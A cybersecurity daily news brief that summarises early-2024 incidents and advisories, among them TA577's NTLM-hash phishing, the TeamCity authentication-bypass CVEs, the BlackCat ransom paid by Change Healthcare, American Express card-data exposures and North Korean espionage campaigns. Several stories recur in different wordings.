Daily Brief

Over 225,000 OpenAI ChatGPT login credentials have been sold on dark web markets. The credentials theft was linked to malware families LummaC2, Raccoon, and RedLine. A 36% increase in compromised ChatGPT accounts was observed from June to October 2023 compared to the first five months of the year. The surge in stolen credentials coincides with nation-state actors' interest in using AI and LLMs for cyberattacks. Cybercriminals are targeting devices with access to AI systems, using stolen data for espionage and conducting attacks. The misuse of valid account information has become a primary method for gaining initial access, complicating identity and access management for defenders. IBM X-Force warns that enterprise credentials can be stolen via credential reuse, browser credential stores, or from enterprise accounts accessed on personal devices.

TA577, a notorious threat actor, has been found utilizing ZIP archives in phishing emails to pilfer NTLM hashes. Two significant campaigns were detected on February 26 and 27, 2024, targeting hundreds of organizations with thousands of messages worldwide. The phishing strategy involves hijacking email threads and using ZIP files containing HTML files that prompt an actor-controlled SMB server connection. The HTML attachments aim to capture NTLMv2 Challenge/Response pairs to facilitate pass-the-hash attacks, allowing unauthorized network traversal and data access. TA577, also known as Water Curupira, is proficient in distributing advanced malware and has a history of rapidly adopting new cyberattack techniques. Proofpoint highlights TA577's agility in adapting to the cybersecurity landscape, continuously evolving methods to evade detection. To mitigate risks, organizations are advised to block outbound SMB connections to curb potential exploit avenues.

Penny Appeal, a charity aiding crisis-hit countries, ordered by ICO to stop sending unsolicited texts. Charity found to have sent over 460,000 spam texts in ten days, violating recipients' consent. ICO received 354 complaints, with recipients reporting ignored opt-out requests and intrusive messaging. Penny Appeal's failure to heed prior warnings resulted in an ICO investigation exposing a flawed database practice. The charity failed to log opt-out requests, messaging individuals who had interacted within the past five years. ICO stresses the importance of valid consent for marketing communications, regardless of the organization's size. This is not the first incidence of a charity facing ICO's scrutiny; even larger charities have been previously fined. The ICO's action highlights the ongoing responsibility for all entities, including non-profits, to comply with direct marketing laws.

Newly disclosed security vulnerabilities in JetBrains TeamCity could allow attackers to take over servers. The identified flaws, CVE-2024-27198 and CVE-2024-27199, have been fixed in the latest TeamCity version. Attackers exploiting these vulnerabilities could bypass authentication and potentially compromise a server, facilitating supply chain attacks. Rapid7, a cybersecurity firm, discovered and reported the flaws which include an authentication bypass and path traversal issue. The TeamCity Cloud instances have already been addressed, but on-premises versions require immediate updates. Prior vulnerabilities in TeamCity have seen exploitation by threat actors from North Korea and Russia, highlighting the risks of delay in patching. JetBrains urges users to update their TeamCity servers to mitigate the risk of exploitation.

Cloudflare has enhanced its web application firewall (WAF) to include protections specifically designed for applications utilizing large language models (LLMs). The service, known as "Firewall for AI," aims to prevent DDoS attacks and the leakage of sensitive data from LLM applications. Features include Advanced Rate Limiting, which caps the number of requests from a single IP or API key, and Sensitive Data Detection, geared towards identifying and preventing private information from being exposed. Clients will be able to create tailored fingerprints to control what their models reveal, with plans to introduce a beta version of prompt validation to defend against prompt injection attacks. This new firewall offering can be applied to any LLM, regardless of whether it's hosted on Cloudflare Workers AI or other platforms, as long as the traffic is proxied through Cloudflare. Cloudflare's move is a response to security concerns in AI as more companies integrate LLMs into their products, highlighting the need for specialized AI security measures.

A security lapse at a third-party service provider resulted in the exposure of American Express cardholder information, including card numbers and expiry dates. The breach involved personal data of an undisclosed number of American Express customers but did not compromise American Express's own systems. American Express's chief privacy officer, Anneke Covell, alerted affected customers through a letter advising of the potential compromise of their card account information. The state of Massachusetts publicized the incident, noting that American Express has been reported for data leaks 16 times this year in the state. Past data breaches reported involved single-digit numbers of Massachusetts residents and were often due to compromised individual merchants or data found online by law enforcement. American Express assures customers that they will not be held liable for fraudulent charges and advises customers to monitor their accounts and enable alerts for suspicious activities.

A severe security vulnerability (CVE-2024-27198) has been identified in JetBrains’ TeamCity On-Premises software, enabling attackers to gain administrative control of the server without authentication. Administrators are urged to promptly upgrade to TeamCity version 2023.11.4 or apply a security patch plugin, as full exploit details are public. The JetBrain's update also resolves a secondary vulnerability (CVE-2024-27199), which permitted alteration of certain system settings by unauthenticated users. Both vulnerabilities affect the web component of all on-premise TeamCity versions, posing potential risks for supply chain attacks. Cybersecurity firm Rapid7 demonstrated exploitability by creating an exploit for a shell access session on a TeamCity server. The less severe vulnerability could potentially be exploited to execute DoS attacks or intercept client connections if the attacker is already on the network. While the TeamCity cloud service has been patched, all unpatched on-premises installations remain vulnerable, and threat actors are anticipated to exploit these weaknesses imminently.

North Korean state-sponsored hacking group Kimsuky is utilizing flaws in ScreenConnect to deploy ToddleShark malware for espionage. ConnectWise earlier urged ScreenConnect users to update servers to patch vulnerabilities CVE-2024-1708 and CVE-2024-1709. ToddleShark uses polymorphism and legitimate Microsoft binaries to evade detection and achieve persistence for continuous data theft. The malware modifies registry settings, schedules tasks, and gathers system information to be sent to the hackers' C2 infrastructure. Kroll's cybersecurity intelligence report indicates ToddleShark's evasion techniques and ties it to previously known Kimsuky backdoors BabyShark and ReconShark. Kroll is set to release specific details and indicators of compromise related to ToddleShark in an upcoming blog post.

Hackers from TA577 are using phishing emails to steal Windows NTLM authentication hashes, enabling account hijacking. Two recent waves of attacks on February 26 and 27, 2024, specifically targeted employees' hashes at hundreds of organizations worldwide. Captured NTLM hashes can facilitate unauthorized access to accounts, sensitive data, and lateral movement within networks. The phishing emails contained ZIP archives with HTML files designed to silently connect to an attacker-controlled SMB server to capture NTLM hashes. Proofpoint's report indicates that despite the lack of malware payloads, the primary objective of these phishing efforts is to gather NTLM hashes. Experts suggest disabling multi-factor authentication increases vulnerability to such attacks and that the stolen hashes may be used for reconnaissance to identify high-value targets. Recommended defensive measures include blocking outbound SMB connections, filtering emails with zipped HTML files, and configuring Windows group policy to restrict outgoing NTLM traffic.

ALPHV/BlackCat, a ransomware gang, is linked to receiving a $22 million ransom payment in Bitcoin possibly connected to the Change Healthcare cyberattack. The payment was detected by Recorded Future analyst Dmitry Smilyanets, observing a 350 Bitcoin transaction to a wallet tied to ALPHV. Change Healthcare, an IT provider for over 70,000 US pharmacies and hospitals, suffered a major BlackCat ransomware attack impacting prescription processing. Questions to Change’s parent company, UnitedHealth Group, about the ransom payment remained unanswered, with a focus on ongoing investigation cited. The ransomware attack disrupted services across multiple pharmacies, including CVS and Walgreens, with systems needing to go offline due to the incident. ALPHV reportedly stole the ransom money from its affiliate who initially executed the cyberattack, raising concerns about trust within ransomware rings. The affiliate claims to retain 4TB of sensitive data from Change Healthcare and its partners, threatening potential leaks if payments are not secured. The situation illustrates the lack of "honor among thieves" and serves as a warning about the risks and reliability within cybercrime affiliate networks.

North Korean operatives allegedly infiltrated servers of South Korean chipmakers to steal product designs, aiding their home semiconductor industry development. Seoul's National Intelligence Service reported ongoing cyber-espionage activities aimed at semiconductor equipment makers since last year. Attackers utilized "living off the land" tactics by employing legitimate administrative tools to evade detection while conducting cyber operations. The intrusions resulted in the theft of product design drawings and facility photos, with at least two known companies affected in December and February. The South Korean spy agency is working closely with victimized firms to strengthen defenses and has informed all national semiconductor entities of potential threats. The announcement aligns with recent warnings about North Korean cybercriminals targeting global defense technologies and conducting elaborate social engineering operations. South Korea links these espionage efforts to the North's struggle to acquire technology due to international sanctions and the increased demand for semiconductors in their weapons programs.

A recording of a sensitive German defense call discussing Ukraine was intercepted and leaked by Russian media. The leak was confirmed by the German Ministry of Defense and involved conversations on the Cisco WebEx platform. High-level officials speculate the leak could have resulted from a Russian agent in the call or a flaw in the implementation of WebEx. The audio disclosure has led to allegations by Russia of Germany's intent to secretly aid Ukraine with Taurus missile deliveries. German officials fear Russia may have more intercepted recordings and that this leak is a strategic effort to influence Germany's military aid to Ukraine. Russian officials have made provocative statements, accusing Germany of becoming an enemy and preparing for war, escalating tensions further. The German government is treating the incident as a serious security breach and as an act of "information war" aimed at disinformation and division. The Bundeswehr is investigating the incident, while the defense minister has publicly denounced the leak as a hybrid disinformation attack.

BlackCat ransomware group has abruptly shut down its servers, stirring speculation about its motives. Allegations have been made that BlackCat scammed its own affiliate out of a $22 million ransom received from Optum after an attack on Change Healthcare. Despite the shutdown of their leak blog and negotiation sites, the group's final message remains cryptic, merely stating "Everything is off, we decide." The aggrieved affiliate claims to still possess 4TB of sensitive Optum data, threatening broader impacts on healthcare and insurance companies. Optum's parent company, UnitedHealth Group, has chosen not to comment on the ransom payment allegations, focusing instead on ongoing investigations. BlackCat, which has rebranded multiple times from DarkSide to BlackMatter, had previously been hit by law enforcement, and now there are hints that either an exit scam or another rebranding could be underway.

American Express has issued warnings to customers about a data breach involving one of their merchant processors, leading to the exposure of card information. The breach resulted in the unauthorized access of American Express Card members' data, including account numbers, names, and expiration dates, but not through a compromise of American Express' systems. The specifics regarding the number of affected customers, the identity of the compromised merchant processor, and the timing of the breach remain undisclosed. American Express has commenced an investigation, alerted regulatory authorities, and is in the process of notifying impacted customers in compliance with legal requirements. Customers are advised to monitor their statements for the next 12 to 24 months and report any suspicious transactions, enabling instant notifications through the American Express app for enhanced security. American Express reassures clients that they will not be held liable for any fraudulent charges made with their cards and suggests requesting a new card if their information was compromised.

The Main Intelligence Directorate (GUR) of Ukraine's Ministry of Defense has announced a breach of the Russian Ministry of Defense (Minoborony) servers. Classified documents purportedly obtained in the cyber operation include sensitive national security details. The "special operation" is said to have been significantly aided by a key minister, Vadimovich, though little context is provided regarding the role or identity. Ukrainian officials released screenshots allegedly from the hacked databases as proof of the successful attack. The legitimacy of the screenshots has not been independently verified by third parties, and the Russian Ministry of Defense has not yet released a statement. The GUR has previously claimed responsibility for cyberattacks on other Russian entities but did not indicate any destructive actions, such as data deletion, in this particular incident with Minoborony.